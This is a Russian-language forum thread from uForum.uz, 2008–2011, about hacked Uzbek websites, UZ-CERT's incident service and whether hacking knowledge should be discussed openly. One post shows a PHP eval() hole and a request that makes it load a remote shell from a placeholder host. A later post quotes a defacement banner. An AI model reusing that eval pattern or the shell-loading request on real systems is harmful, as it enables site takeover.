uForum.uz

uForum.uz (https://uforum.uz/index.php)
-   Инциденты (https://uforum.uz/forumdisplay.php?f=133)
-   -   Взломы в зоне .UZ (https://uforum.uz/showthread.php?t=5397)

elf 12.06.2008 11:23

Взломы в зоне .UZ

Народ, разместите сюда информации о взломанных сайтах с анализами взлома. Надеюсь, это будеть всем полезно, особенно для не профессионалам по безопасности.

Недавно взломаны сайт Каракалпакстан-онлайн: kr.uz и его форум с 19 летного взломщика из России. Модераторы сказали, что атака устроена через опрос-форма сайта. Если у Вас еще какие то инфы, пишите плиз...

Ivan Lodyanoy 12.06.2008 11:32

Цитата:

Сообщение от elf (Сообщение 109652)
Народ, разместите сюда информации о взломанных сайтах с анализами взлома. Надеюсь, это будеть всем полезно, особенно для не профессионалам по безопасности.

Недавно взломаны сайт Каракалпакстан-онлайн: kr.uz и его форум с 19 летного взломщика из России. Модераторы сказали, что атака устроена через опрос-форма сайта. Если у Вас еще какие то инфы, пишите плиз...

Это приватная информация, мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами". Хватает списка зараженых сайтов.

elf 12.06.2008 11:51

Цитата:

Сообщение от Ivan Lodyanoy (Сообщение 109658)
Это приватная информация, мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами". Хватает списка зараженых сайтов.

каждый день сколько сайтов заряжается в узнете? помоему максимум 5. если каждый день разместим списка, это не будеть бесполезно. да, сайты хватает, но анализы взлома почти нету.

Ivan Lodyanoy 12.06.2008 11:57

Цитата:

Сообщение от elf (Сообщение 109669)
Цитата:

каждый день сколько сайтов заряжается в узнете? помоему максимум 5. если каждый день разместим списка, это не будеть бесполезно. да, сайты хватает, но анализы взлома почти нету.

Есть статьи, новости, бактрек на cert.uz. Там можно читать. А анализы выкладывать в паблик вам никто не даст. Это потенциальная очередная угроза для сайт, а так же его престиж, рейтинг. Администраторы сайтов уведомляются о том, что у них есть "дыры", исправляют.

Dmitry Paleev 12.06.2008 15:46

Цитата:

Цитата:

Анализом взломов, угроз и уязвимостей ежедневно занимается соответствующая группа Службы UZ-CERT. В случае обращения в Службу UZ-CERT по вопросам компьютерных инцидентов проводится работа по выявлению источника угрозы, методов несанкционированного доступа и проникновения в систему, выявляются деструктивные действия произведенные злоумышленниками, анализируются системные журналы и события и т.д. Вся информация полученная в процессе работы является конфиденциальной и не подлежит огласке третьей стороне. Отчет об анализе с рекомендациями получает непосредственнно владелец ресурса.

Igor Khan 12.06.2008 16:56

Цитата:

Сообщение от Dmitry Paleev (Сообщение 109792)
Анализом взломов, угроз и уязвимостей ежедневно занимается соответствующая группа Службы UZ-CERT. В случае обращения в Службу UZ-CERT по вопросам компьютерных инцидентов проводится работа по выявлению источника угрозы, методов несанкционированного доступа и проникновения в систему, выявляются деструктивные действия произведенные злоумышленниками, анализируются системные журналы и события и т.д. Вся информация полученная в процессе работы является конфиденциальной и не подлежит огласке третьей стороне. Отчет об анализе с рекомендациями получает непосредственнно владелец ресурса.

На каких условиях вы осуществляете эту работу? У нас возникла необходимость в выявлении уязвимостей eduportal.uz, а также предотвращении попыток несанкционированного доступа и проникновения в систему.

Ruslan Aliev 12.06.2008 17:03

Цитата:

Цитата:

Вы хотите чтобы на форуме Узинфокома публиковались руководства для Хакеров?

Timur Naimov 12.06.2008 17:09

Цитата:

Сообщение от elf (Сообщение 109652)
Народ, разместите сюда информации о взломанных сайтах с анализами взлома.

Хм...
- Знаешь как узбекские сайты ломают?
- Нет
- Пойдем покажу, потом сами попробуем...

ePifani 05.08.2008 23:09

не хотелось создать новую тему !
можно ли создать сайты посвешоные комп безопасности ну в росии есть типа zloy.ru...ну у них еще дефейс ленты есть! их владельсов и пользователей не трогают у нас тоже так? или нельзя?

Evgeniy Sklyarevskiy 06.08.2008 13:46

Цитата:

мне кажется, никто не заинтересован в том, чтоб его сайт выставляли с "дырами".

Не совсем так - если сайт дефейснули - значит, он заметен и интересен - проходные бездарные сайты не трогают.

И в большинстве случаев атакующие оставляют запись типа - "Админ, обрати внимание на порт такой-то или дыру там-то" - то есть, подсказывают, где и что не закрыто. Благородно так...
Писал об этом большую статью - есть на сайте журнала.

Eldar Ishimbaev 06.08.2008 13:48

Цитата:

Сообщение от Evgeniy Sklyarevskiy (Сообщение 126555)
Не совсем так - если сайт дефейснули - значит, он заметен и интересен - проходные бездарные сайты не трогают.

Вы ошибаетесь.

Azamat Atajanov 06.08.2008 14:37

Цитата:

если сайт дефейснули - значит, он заметен и интересен - проходные бездарные сайты не трогают.

Как-то 60 сайтов дефейснули ребята, даже не знавшие, где находится Узбекистан.

Evgeniy Sklyarevskiy 06.08.2008 14:44

Цитата:

Сообщение от Eldar Ishimbaev (Сообщение 126557)
Цитата:

Вы ошибаетесь.

Это был один из вариантов развития ситуации. Имевших место быть ;-)

Eldar Ishimbaev 06.08.2008 14:53

Цитата:

Сообщение от Evgeniy Sklyarevskiy (Сообщение 126591)
Это был один из вариантов развития ситуации. Имевших место быть ;-)

Что? То, что Вы ошибаетесь, это один из вариантов развития ситуации? Имевшего место быть?

Rustam Kh 27.10.2008 17:50

Цитата:

Сообщение от ePifani (Сообщение 126377)
не хотелось создать новую тему !
можно ли создать сайты посвешоные комп безопасности ну в росии есть типа zloy.ru...

ИМХО
Можно,но не как zloy. Правила не позволяют. Там не только безопасность, но и хакинг, варез.
Вот электронный журнал по информационной безопасности http://www.security.uz/

CTAPu4OK 21.11.2008 21:09

Цитата:

Можно,но не как zloy. Правила не позволяют. Там не только безопасность, но и хакинг, варез.
Бред... на счет вареза вы обсалютно правы.. но на счет хакинга нет...
Как учится людям IT, если не иметь понятия что такое хакинг ?
В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ?
программисты.. которые не знают все уловки и не могут мыслить как хакеры.
Те кто используют Хак в противозаконных целях меня бесят... но те кто задумываются над тем что это не только плохо и противозаконно... но так же и то что они портят жизнь номральным людям...

Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг... что бы люди читали статьи о взломах и понимали что это плохо.. лучше всего помогать другим и докладывать о каждой ошибке....

Если я не прав, поправьте меня...

Rustam Kh 30.11.2008 23:46

Цитата:

Сообщение от CTAPu4OK (Сообщение 155707)
Цитата:

Те кто используют Хак в противозаконных целях меня бесят... но те кто задумываются над тем что это не только плохо и противозаконно... но так же и то что они портят жизнь номральным людям...

Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг... что бы люди читали статьи о взломах и понимали что это плохо.. лучше всего помогать другим и докладывать о каждой ошибке....

Вы ошибаетесь. ©Eldar Ishimbaev
И вообще, что вы подразумеваете под словом "хак"?
У нас наверное совсем разные понятия.
Цитата:

Фильмы про хакеров меньше смотреть надо
Не буду с Вами спорить, судя по вашему сообщению толку нет.

Цитата:

это не только плохо и противозаконно

Цитата:

в сети Уз должен быть хоть один сайт про Хакинг

CTAPu4OK 21.01.2009 20:08

Цитата:

Сообщение от Rustam Kh (Сообщение 157828)
Цитата:

Цитата:

Вы ошибаетесь. ©Eldar Ishimbaev
И вообще, что вы подразумеваете под словом "хак"?
У нас наверное совсем разные понятия.

Фильмы про хакеров меньше смотреть надо

Цитата:

это не только плохо и противозаконно

Цитата:

в сети Уз должен быть хоть один сайт про Хакинг

Что я подразумиваю под словом Хак ? вы подумайте, может поймете, прочитайте еще раз мое сообщение...

Цитата:

Да что вы ? а что в моем сообщении не так ? я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...
И если можно объясните что вы имели в виду под предложением
судя по вашему сообщению

А на счет фильмов про хакеров... может кто то и смотрит в надежде чему либо научится... я не из их числа xD

Надеюсь уязвимых ошибок в словах не оставил... =)))))

Dolphin 22.01.2009 11:11

Цитата:

В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ? программисты.. которые не знают все уловки и не могут мыслить как хакеры.

Вообще-то подавляющее большинство сайтов в зоне uz работают на разнообразных CMS, вордпрессах, джумлах и подобных вещах - а эксплоиты, юзающие их ошибки - не редкость. Как-раз таки простенький самописный движок сложней поломать - непопулярен его исходный код, и в нем нет лишних функций. У многих в админке хостера вообще пароли простые.
Цитата:

Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг...

Зачем? Он не сразу догонит ресурсы по секьюрити в зоне ru и тем более, в доткоме, соответственно, загнется. Было дело.
Цитата:

Сообщение от CTAPu4OK (Сообщение 174003)
я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...

Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.

Albert Sabirov 24.01.2009 16:25

Я думаю тема правильная. Обсуждать и исправлять на будущее это лучше, чем потом сопли жувать)

CTAPu4OK 18.06.2009 23:11

Цитата:

Сообщение от Timur Rasulov (Сообщение 174110)
Цитата:

Сообщение от CTAPu4OK (Сообщение 174003)
я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...

Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.

С чего вы взяли что если я приведу пример то покажу всем свою безграмотность в PHP ?
Один раз ко мне постучался знакомый, PHP занимается 3 года, попросил нарисовать и сверстать шаблон под главную...
Но как только я глянул в код, я ахнул!!!!

он решил засунуть переменную под евал
PHP код:

<?
eval($test);
?>

Один запрос
http://test.ru/index.php?test=http://xak/shell.php
Вот вам и самописные двиги которые трудно ломать =D

А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь....
SQL INJ
PHP INJ
XSS все виды
Не защищеные поля веб форм
Раскрытие путей
и прочии ошибки...

Dolphin 19.06.2009 10:52

Цитата:

Сообщение от CTAPu4OK (Сообщение 232406)
А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь.... SQL INJ PHP INJ XSS все виды Не защищеные поля веб форм Раскрытие путей и прочии ошибки...

Цитата:

Вначале нужно понять конструкцию и логику вебсервера

CTAPu4OK 20.06.2009 05:40

Цитата:

Сообщение от Timur Rasulov (Сообщение 232503)
Цитата:

Сообщение от CTAPu4OK (Сообщение 232406)
А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь.... SQL INJ PHP INJ XSS все виды Не защищеные поля веб форм Раскрытие путей и прочии ошибки...

Цитата:

Вначале нужно понять конструкцию и логику вебсервера

И что вам это даст ?
У веб серверов логики не какой нету, это искусственный разум =)
Максимум что вы сможете сделать на веб сервере это урезать права на выполнение скриптов, а дырки то все равно останутся, и заметьте новые фильтры на обход защиты появляются все чаще и чаще.

dmitry.uz 22.06.2009 14:54

Интересно получается - людям больше интересно не как защитить сайт, а как его могут сломать :)
Сломать могут по разному - нет универсальной защиты.
Если програмист грамотный и админ не ленивый - то школяры уже не сломают, только профи - но какому профи будет интересен узбекский сайт ? Имхо ИКТ в нашей стране еще настолько не развит что получить выгоду от "ломки" никто не сможет, а профи ради спортивного интереса не ломают.
Тем паче что сейчас Китай дает такие ресурсы и мощности, что даже дидосеры перестали ломать обычные сайты. Если не лень - обычно все стараются банить весь китайский диапазон адресов - обычно лезут оттуда, а обывателю из Китая - нечего делать на наших сайтах.

Nestik 11.09.2009 11:52

Не думаю что такой ресурс нужен. И без него навалом баг трекеров и прочего. В общей сложности методы взлома однообразны, достаточно почитать общие статьи на эти темы коих в нете навалом и применить их к своим реалиям, а также внимательно следить за баг трекерами используемого программного обеспечения, и не ленится что-то делать, ужасно много взломов из за элементарной лени (не стали дописывать пару строчек кода для проверки, админ поленился досконально настроить права и т.д.). В 90% случаев этого будет достаточно. А другим 10% как уже было сказано Узбекистан нафиг не нужен.

Alexandr Pavlenko 11.09.2009 13:45

Цитата:

Оффтоп:
ерунда, это можна писать как и для одминов, да и руководства для хакеров, можна найти где угодно, а опытом (не хакерским, а из анализа исходящего - одминским) поделиться я считаю можна

Цитата:

Сообщение от Timur Naimov (Сообщение 110075)
Хм...
- Знаешь как узбекские сайты ломают?
- Нет
- Пойдем покажу, потом сами попробуем...

Оффтоп:
чушь, за жопу горло возьмут сразу, и не узнают где могилка твоя

Цитата:

Сообщение от Dmitry Paleev (Сообщение 109792)
Вся информация полученная в процессе работы является конфиденциальной и не подлежит огласке третьей стороне.

я извеняюсь это все делается за Ваш счет?я просто не в курсе, или Вы тут рекламу сделали? =)

Dmitry Paleev 11.09.2009 14:10

Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269583)
я извеняюсь это все делается за Ваш счет?я просто не в курсе, или Вы тут рекламу сделали? =)

Не понял Вашего вопроса. С деятельностью Службы UZ-CERT можете ознакомиться здесь.

insider 11.09.2009 15:16

Цитата:

Сообщение от Dmitry Paleev (Сообщение 269597)

Оффтоп:

это типа на сайте будет раздел такого содержания:

Руководство для хакера...
как взломать uzinfocom ?
для этого надо подключится к серверу через ssh (putty)
в ввести в login: root , а password: 86hhyqiiy564g , после авторизации
сервер полностью ваш ....
:biggrin:

Alexandr Pavlenko 11.09.2009 16:03

Цитата:

Сообщение от Dmitry Paleev (Сообщение 269597)
Не понял Вашего вопроса. С деятельностью Службы UZ-CERT можете ознакомиться здесь.

С деятельностью Службы UZ-CERT ознакомился...спасибо.
Цитата:

...консультативную и техническую поддержку пользователям в предотвращении угроз компьютерной безопасности.
Значит ли это, что я звоню вам и говорю: "Я купил то такой то домен, взоне uz хачу повесить сайт, что мне нужно предпринять чтобы его не "хакнули"", а Вы мне собственно отвечаете:"То то и то то" или вы сами в процессе анализа зоны уз, после того как я сайтец повесил, говорите мне: "Ваш сайт подвержен риску атаки!!!Сделайте то то, то то"??

Цитата:

Сообщение от CTAPu4OK (Сообщение 232823)
У веб серверов логики не какой нету, это искусственный разум =)

Оффтоп:
Вам бы в НУУЗе нейронные сети и искусственный интелект преподавать, спросите Николая Александровича

Timur Naimov 11.09.2009 16:24

Оффтоп:
Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269583)

Кто Вам дал право переходить со мной на ты?
За горло брать будете лично Вы?
Могилку копать тоже?

Я вообще не понял к чему это все было сказано?

Alexandr Pavlenko 11.09.2009 16:43

Цитата:

Сообщение от Timur Naimov (Сообщение 269654)
Оффтоп:
Цитата:
Сообщение от Alexandr Pavlenko Посмотреть сообщение
Кто Вам дал право переходить со мной на ты?
За горло брать будете лично Вы?
Могилку копать тоже?

Я вообще не понял к чему это все было сказано?

Оффтоп:
не бейте меня, обращение не к вам а риторическое

а сказано это былы к тому, что суть диалога вашего - просто напросто набор слов из головы, и если ВЫ действительно считаете,
что два 15-летних пацана (а других кулхацкеров у нас нет), завидут такой вот диалог начитавшись этой ветки, то я и говорю, что это чушь!

Оффтоп:
или Вы сами заведете, такой вот диалог?? тогда канешна, я глубоко извеняюсь за все что писалось раньше, потому как -да, тогда это можно принять на свой счет

Timur Naimov 11.09.2009 16:55

Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269673)
что суть диалога вашего - просто напросто набор слов из головы

А суть Вашего диалога другая, Вы слова не из головы берете? :) Из другого места какого-то?

Цитата:

и если ВЫ действительно считаете,
что два 15-летних пацана (а других кулхацкеров у нас нет), завидут такой вот диалог, то я и говорю, что это чушь!

Причем тут "15-летние пацаны" и "кулхацкеры". Моя фраза была ответом на просьбу "Народ, разместите сюда информации о взломанных сайтах с анализами взлома".

Я не знаю кто такие "кулхацкеры", есть ли они у нас в стране и каков их возростной состав. Тем более я не знаю, какие разговоры они могут вести.

Alexandr Pavlenko 11.09.2009 16:58

Цитата:

Сообщение от Timur Naimov (Сообщение 269675)
А суть Вашего диалога другая, Вы слова не из головы берете? Из другого места какого-то?

Оффтоп:
заценил =)

ну тогда суть этой фразы в студию, потому как я значица неправильно ее истолковал..

Timur Naimov 11.09.2009 17:00

Оффтоп:
Цитата:

или Вы сами заведете, такой вот диалог?? тогда канешна, я глубоко извеняюсь за все что писалось раньше, потому как -да, тогда это можно принять на свой счет

Александр, Вы ответили на мой пост в достаточно грубой форме. На чей счет я должен был это принять?
Теперь Вы сравниваете меня с "15-летним кулхацкером", т.к. по Вашему мнению именно им свойственны такие диалоги.
У Вас проблемы, Вы хотите об этом поговорить? Я Вам чем-то не нравлюсь? Есть раздел "К барьеру".

Alexandr Pavlenko 11.09.2009 17:12

Оффтоп:

Цитата:

Сообщение от Timur Naimov (Сообщение 269681)
Александр, Вы ответили на мой пост в достаточно грубой форме.

грубую форму поста каждый постер определяет для себя в отдельности, если по вашему это грубо, чтож вы вправе так считать..

Цитата:

Теперь Вы сравниваете меня с "15-летним кулхацкером"

я не заметил у себя в постах "Timur Naimov"=="15-летнй кулхацкер"

Цитата:

У Вас проблемы, Вы хотите об этом поговорить?

кажется вы начинаете грубить....(, между прочим некрасиво...

Цитата:

Я Вам чем-то не нравлюсь?

Вы мне абсолютно безразличны...

Цитата:

Есть раздел "К барьеру".

создавайте тему, если я Вас так задел, приду

Dmitry Paleev 11.09.2009 17:13

Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269643)
Значит ли это, что я звоню вам и говорю: "Я купил то такой то домен, взоне uz хачу повесить сайт, что мне нужно предпринять чтобы его не "хакнули"", а Вы мне собственно отвечаете:"То то и то то" или вы сами в процессе анализа зоны уз, после того как я сайтец повесил, говорите мне: "Ваш сайт подвержен риску атаки!!!Сделайте то то, то то"??

Если Вас интересует что-то конкретное, либо Вы хотите получить совет или рекомендации по используемому Вами ПО, можете обращаться посредством электронной почты, создав тему в ветке UZ-CERT на данном форуме, или позвонив по телефонам. Все контакты есть у нас на сайте. По мере возможности постараемся помочь. Что касается работающих ресурсов в зоне .UZ, то как раз для владельцев таких ресурсов нами была открыта программа UZ-CERTified. Зарегистрироваться в данной программе может владелец ресурсов в доменной зоне UZ. После чего его ресурс будет проверен на наличие угроз ИБ, а также будет доступен ряд других сервисов. Подробнее о программе UZ-CERTified можете узнать здесь. Помимо этого, сотрудниками Службы UZ-CERT периодически проводится мониторинг ресурсов в доменной зоне UZ на наличие угроз ИБ и вредоносных ссылок. Подробнее в этой теме.

Timur Naimov 11.09.2009 17:31

Оффтоп:
Цитата:

Сообщение от Alexandr Pavlenko (Сообщение 269683)
создавайте тему, если я Вас так задел, приду

Нет, "так" не задели. Меня вообще сложно вывести из себя :) Порешим на полной нашей безразличности друг к другу.

beksam 29.06.2011 15:53

Дефейс joomla.uz

Дефейс joomla.uz
Собственно сабж, уже не первый месяц так стоит как я понял.

Код:

HACKED BY:N0FAC3

N0FAC3 - DSRsysGR - H0AX TR0JAN - ALBDRAG0N

UNITED STATES OF ALBANIA

nofac3@hotmail.com

Republic of Kosovo Hackers

Greetz:Phantom a.k.a empror & Flaming BoOt3r

Вот по теме:
JOOMLA.UZ HACKED BY E404 a.k.a N0FAC3
http://www.youtube.com/watch?v=UW0A1rY_qY8
Видео загружено 06.05.2011

azim 29.06.2011 16:05

Наверняка нашли дыру в устаревшей версии движка. Обновляться вовремя надо...

Aziz Madetov 29.06.2011 16:52

http://womenfootball.uz/ тоже. Руки им поотрывать!

Текущее время: 16:00. Часовой пояс GMT +5.